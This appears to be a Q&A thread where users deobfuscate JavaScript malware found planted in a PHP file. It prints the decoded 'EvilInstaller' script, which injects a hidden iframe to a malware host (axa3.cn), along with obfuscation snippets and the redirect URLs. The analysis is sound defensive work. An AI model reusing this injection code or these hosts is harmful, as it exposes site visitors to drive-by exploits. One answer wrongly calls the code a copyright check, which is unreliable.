可以将文章内容翻译成中文,广告屏蔽插件可能会导致该功能失效(如失效,请关闭广告屏蔽插件后再试):
问题:
I've got some code that was at the bottom of a php file that is in javascript. It goes through lots of weird contortions like converting hex to ascii then doing regex replacements, executing code and so on...
Is there any way to find out what it's executing before it actually does it?
The code is here:
http://pastebin.ca/1303597
回答1:
You can just go through it stage by stage - since it's Javascript, and it's interpreted, it needs to be its own decryptor. If you have access to a command-line Javascript interpreter (such as the Console in Firebug), this will be fairly straightforward.
I'll have a look and see what comes up.
Edit I've got through most of it - it seems like the final step is non-trivial, probably because it involves "argument.callee". Anyway I've put up what I have so far on Pastebin.
Interestingly I found the hardest part of this was giving the gibberish variables proper names. It reminded me of a crossword, or sudoku, where you know how things are related, but you can't definitively assign something until you work out what its dependant parts are. :-) I'm sure that if someone recognises the algorithm they can give the parts more meaningful names, but at the bit where there's a lot of XORing going on, there are two temporary variables that I've just left as their default names since I don't know enough context to give them useful ones.
Final edit: The 'arguments.callee' bit became easy when I realised I could just pass in the raw text that I'd ironically just been decoding (it's quite a clever technique, so that normal deobfuscation won't work because of course once you rename the variables, etc, the value is different). Anyway, here's your script in full:
function EvilInstaller(){};
EvilInstaller.prototype = {
getFrameURL : function() {
var dlh=document.location.host;
return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.') + "." + this.getRandString() + "." + this.host + this.path;
},
path:'/elanguage.cn/',
cookieValue:1,
setCookie : function(name, value) {
var d= new Date();
d.setTime(new Date().getTime() + 86400000);
document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString();
},
install : function() {
if (!this.alreadyInstalled()) {
var s = "<div style='display:none'><iframe src='" + this.getFrameURL() + "'></iframe></div>"
try {
document.open();
document.write(s);
document.close();
}
catch(e) {
document.write("<html><body>" + s + "</body></html>")
}
this.setCookie(this.cookieName, this.cookieValue);
}
},
getRandString : function() {
var l=16,c='0Z1&2Q3Z4*5&6Z7Q8*9)a*b*cQdZeQf*'.replace(/[ZQ&\*\)]/g, '');
var o='';
for (var i=0;i<l;i++) {
o+=c.substr(Math.floor(Math.random()*c.length),1,1);
}
return o;
},
cookieName:'hedcfagb',
host:'axa3.cn',
alreadyInstalled : function() {
return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
}
};
var evil=new EvilInstaller();
evil.install();
Basically it looks like it loads malware from axa3.cn. The site is already suspected by the ISP though, so no telling what was actually there above and beyond general badness.
(If anyone's interested, I was using Pastebin as a pseudo-VCS for the changing versions of the code, so you can see another intermediate step, a little after my first edit post. It was quite intriguing seeing the different layers of obfuscation and how they changed.)
回答2:
Whilst you can decode manually, it can soon get tedious when you have many stages of decoding. I usually replace eval/write to see each step:
<script>
window.__eval= window.eval;
window.eval= function(s) { if (confirm('OK to eval? '+s)) return this.__eval(s); }
document.__write= document.write;
document.write= function(s) { if (confirm('OK to write? '+s)) return this.__write(s); }
</script>
However this particular script is protected against this by deliberate inspection of window.eval. Use of arguments.callee also means the script relies on a particular browser's Function.toString format, in this case IE's - it won't work on other browsers. You can put workarounds in the replacement eval function to give the script what it expects in this case, but it's still a bit of a pain.
You could use the Script Debugger to step through the code, or what I did in this case was allow the code to run, in a virtual machine with no networking that I could afford to write off. By looking at document.body.innerHTML after the code had run I found it added an invisible iframe pointed at:
hxxp://62bc13b764ad2799.bbe4e7d3df5fdea8.axa3.cn/elanguage.cn/
which redirects to:
hxxp://google.com.upload.main.update.originalcn.cn/ebay.cn/index.php
which, viewed in suitable conditions in IE, gives you a load of exploits. Don't go to these URLs.
In short your server has been hacked by axa3.cn, one of the many Chinese-hosted but Russian-operated malware gangs in operation at the moment.
回答3:
Just write a perl script or something that changes all escaped hex characters to ascii? Then just look through the regexs to see what exactly is happening, and do the same thing with your perl/whatever script.
回答4:
You can try the firebug console and break it down piecemeal. As a start:
var jQuery = eval('w;iLn0d;opw;.0epv_a_l;'.replace(/[;0_pL]/g, ''));
is just masking the "eval" function as "jQuery"
回答5:
Easiest approach would be too simply use a simple c program to convert the escaped hex characters into readable text like so:
#include <stdio.h>
const char wtf[] = ""; // Really long string goes here
int main(void) {
::printf("%s\n", wtf);
}
which yields this (I added formatting). I'll let you finish off the last part which appears to be more of the same.
回答6:
very carefully - if someone is going to this much trouble to obfuscate the code, it is probably some kind of attack script
you can output the results of execution in stages using a local html file, and take it a piece at a time
doing this i get:
var jQuery = "eval(" +
'w;iLn0d;opw;.0epv_a_l;'.replace(/[;0_pL]/g, '') +
");";
document.writeln('jQuery=' + jQuery);
which yields
jQuery=eval(window.eval);
which, as crescentfresh observed, binds the variable jQuery to the window.eval function.
the next section is obviously trying to eval something in hex code, so let's see what the hex code string looks like (reformatted manually for presentation purposes):
function g4LZ(s9QNvAL)
{
function eDdqkXm(fX09)
{
var uaWG=0;
var jtoS=fX09.length;
var aCD6=0;
while(aCD6wQ5.length)
d971I=0;
if(f234SD>lIXy6md.length)
f234SD=0;
kyCyJ+=String.fromCharCode(nCV2eO^ocx) + '';
}
eval(kyCyJ);
return kyCyJ=new String();
}
catch(e){}
}
g4LZ('%33...%5e');
and now we've got an escaped string at the end, let's see what's in there using unescape (truncated for presentation):
30248118GA0* l: WRG:nt9*82:)7Z\uF%*{...
frankly, i'm getting bored taking this apart, so instead i dumped it into a local html file, disconnected from the internet, opened firefox, disabled javascript, loaded the file in firefox, turned on firebug, reloaded the page so it would run, and inspected the DOM.
the script creates an IFRAME with SRC set to [altered for safety!]:
http://4b3b9e839fd84e47 [DO NOT CLICK THIS URL] .27f721b7f6c92d76.axa3.cn/elanguage.cn/
axa3.cn is a chinese domain on the malware blacklist
回答7:
I know its not the answer, but usually(where ive seen this kinda stuff), they are placed so if that line isnt executed, all the script stops. Why do they do that? Well coz they are printing their copyright on the script(or more usually a template).
When people goes to all that trouble for you to give recognition is because they do have a remove copyright licence, i would recommend paying for it, since even if you "reverse engineer" that, they can(and have) other ways to check if your license is true. (some of those softwares will actually send some kind of message if you are doing that).
But, before i get any kind of flame, i agree its interesting to go back in this kind of securities and get the original code and break it =)